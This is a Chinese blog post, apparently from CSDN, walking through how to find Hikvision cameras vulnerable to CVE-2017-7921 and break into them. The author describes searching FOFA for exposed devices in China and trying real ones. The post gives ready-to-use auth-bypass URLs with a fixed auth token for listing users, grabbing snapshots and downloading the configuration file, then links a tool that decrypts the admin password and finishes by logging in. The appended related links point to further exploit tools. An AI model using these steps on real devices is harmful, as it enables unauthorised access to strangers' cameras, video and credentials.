海康威视CVE-2017-7921漏洞查找与利用

最新推荐文章于 2024-06-04 14:46:56 发布
最新推荐文章于 2024-06-04 14:46:56 发布
阅读量2.1k 收藏 9
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AngrySnack/article/details/133764069
版权

之前查看摄像头时发现了海康威视的存在CVE-2017-7921漏洞,因此找个试下。

1、fofa搜索

直接查找海康威视和中国地区的,很遗憾大部分都不能利用

点进去就能看到登录的后台地址

可以进行弱口令尝试,此处有点困难。

2、直接查看是否存在CVE-2017-7921漏洞

CVE-2017-7921存在3个漏洞

1、检索所有用户及其角色的列表

http://camera.ip/Security/users?auth=YWRtaW46MTEK

2、在没有身份验证的情况下获取摄像头快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

3、下载摄像头配置账号密码文件

http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

在fofa中找到的ip大部分漏洞已被修复,如果想要尝试这个漏洞,可能得找一会

3、还原配置文件账号密码

exe地址

https://github.com/Bin4xin/bigger-than-bigger/blob/master/CoVV/Hikvision%20Unauth/hikvision-decrypter.exe

使用方式简介,打开下载的配置文件–>加密 --> 解密 --> 输出 --> 二进制文件读取

当然导入时需要选择加密

打开文件后,从之前的users中得到登录账号名为admin,可以直接搜索,找到对应的密码。

4、登录尝试


可以关注公众号:码字的秃猴,一起玩耍哦

AngrySnack
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 1429
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
海康威视漏洞合集
weixin_46626737的博客
07-03 4034
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc。漏洞版本:大多数设备。
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
菜鸟学渗透
05-22 8522
这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
Nday 海康综合安防管理平台存在多个漏洞、29个漏洞合集
最新发布
weixin_43167326的博客
06-04 965
海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。
海康摄像头CVE-2021-36260漏洞复现
A_991128a的博客
04-25 1598
攻击者利用漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
CVE-2017-7921复现(解密文件)
热门推荐
1stPeak's Blog
06-03 1万+
前言:CSDN管理博客内容较严格,有些内容会涉嫌违法违规,以往发布的被打回,这篇文章是经修改后的,故下面有些内容我会粗略写到,大家主要看payload即可 可解密:configurationFile
海康威视CVE-2017-7921
qq_46527139的博客
12-22 1万+
海康威视CVE-2017-7921
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 4419
海康威视越权访问CVE-2021-7921漏洞复现
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
hikvision-decrypter.zip
11-29
下载hikvision海康威视设备的配置文件,通过该解密工具可以解密,解密后得到的文件用十六进制编辑器打开后,能看到密码的明文,实测很强大!
Hikvision配置文件解码器.zip
10-25
解密Hikvision视频监控设备配置文件,得到正确的二进制配置文件
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
海康威视iVMS-4200 Video Wall 2.6.17.5客户端
11-29
海康威视iVMS-4200 Video Wall是一款专为视频监控系统设计的客户端软件,主要用于管理和显示监控画面。版本2.6.17.5是该软件的一个更新迭代,提供了更稳定、高效的功能。以下是关于这个系统的一些详细知识点: 1. *...
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 3077
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
qq_50854662的博客
06-30 2339
海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
海康威视(Hikvision)多款摄像头_未授权访问[CVE-2017-7921]
碌碌无为,改变现状的博客
11-17 1404
海康威视(Hikvision)多款摄像头_未授权访问[CVE-2017-7921]
海康威视ds-7816n-sn升级包
05-02
海康威视ds-7816n-sn升级包是指海康威视监控设备DS-7816N-SN的固件升级程序。固件是由设备制造商提供的操作系统,它将控制设备的各项功能和操作。固件升级可以修复设备中的漏洞和缺陷,增强设备的稳定性、安全性和功能。 升级海康威视ds-7816n-sn的方法很简单。首先下载适用于您的设备的升级包,并将其解压缩到计算机上。接下来,将文件复制到U盘或SD卡,然后将其插入DS-7816N-SN设备的USB接口或SD卡插槽。在设备上,选择菜单中的“系统设置”,然后选择“升级”选项。浏览到您所存储升级文件的位置,然后选择“开始升级”。 升级期间请勿将设备关闭或断开电源。升级完成后,设备将重启。 总之,海康威视ds-7816n-sn固件升级包是一个重要的更新,它可以提高设备的性能、可靠性和安全性。升级时应严格按照说明进行,注意备份所有重要的数据,并确保固件升级文件下载自官方网站。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值